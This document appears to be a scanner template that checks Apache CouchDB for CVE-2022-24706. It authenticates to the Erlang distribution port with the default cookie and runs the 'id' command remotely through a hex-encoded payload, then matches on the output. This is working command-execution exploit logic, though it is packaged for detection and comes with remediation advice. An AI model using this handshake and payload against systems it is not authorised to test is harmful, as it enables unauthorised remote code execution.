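id: CVE-2022-24706

# Active network check for the Erlang distribution port of Apache CouchDB.
# It completes the distribution handshake with the cookie from `variables`
# and then sends one fixed request. A match means the node accepted that
# cookie and returned command output, so the port is reachable and still
# uses the shipped secret.
info:
  name: CouchDB Erlang Distribution - Remote Command Execution
  author: Mzack9999,pussycat0x
  severity: critical
  description: |
    In Apache CouchDB prior to 3.2.2, an attacker can access an improperly secured default installation without authenticating and gain admin privileges.
  remediation: |
    Upgrade to Apache CouchDB 3.2.2 or later, replace the default Erlang cookie with a unique secret, and keep epmd (4369) and the Erlang distribution port unreachable from untrusted networks.
  reference:
    - https://www.exploit-db.com/exploits/50914
    - https://github.com/sadshade/CVE-2022-24706-CouchDB-Exploit/blob/main/CVE-2022-24706-Exploit.py
    - https://nvd.nist.gov/vuln/detail/CVE-2022-24706
  metadata:
    max-request: 2
    # Quoted so the embedded colon and double quotes stay one literal string.
    shodan-query: 'product:"CouchDB"'
    verified: true
  tags: cve,cve2022,network,couch,rce

variables:
  # First handshake message (hex), sent as-is.
  name_msg: "00156e00050007499c4141414141414041414141414141"
  # Fixed prefix of the challenge reply; the MD5 digest is appended at runtime.
  challenge_reply: "00157201020304"
  # Default cookie of affected installs. A node with a unique cookie fails
  # the handshake and does not match.
  cookie: "monster"
  # Fixed post-handshake request (hex); the matcher below expects `id` output.
  cmd: "0000006670836804610667770e41414141414140414141414141410000000300000000007700770372657883680267770e41414141414140414141414141410000000300000000006805770463616c6c77026f737703636d646c000000016b000269646a770475736572"

tcp:
  - inputs:
      # auth
      - data: "{{name_msg}}"
        type: hex
        read: 1024

      # Second read is stored as `challenge` for the digest below.
      - read: 1024
        name: challenge

      # Reply = prefix + md5(cookie + decimal challenge), where the challenge
      # is the big-endian 32-bit value taken from the stored response.
      - data: "{{challenge_reply+md5(cookie + to_string(unpack('>I',substr(challenge, 9, 13))))}}"
        type: hex

      # rce
      - data: "{{cmd}}"
        type: hex
        read: 1024

    # Probes the supplied address and port 9100 on the same host.
    # NOTE(review): the distribution port is configurable, so no match here
    # does not show the node is unexposed on another port. Confirm against
    # the deployment's port settings.
    host:
      - "{{Hostname}}"
      - "{{Host}}:9100"

    # All three words must appear in the raw response (condition: and).
    matchers:
      - type: word
        part: raw
        words:
          - "uid"
          - "gid"
          - "groups"
        condition: and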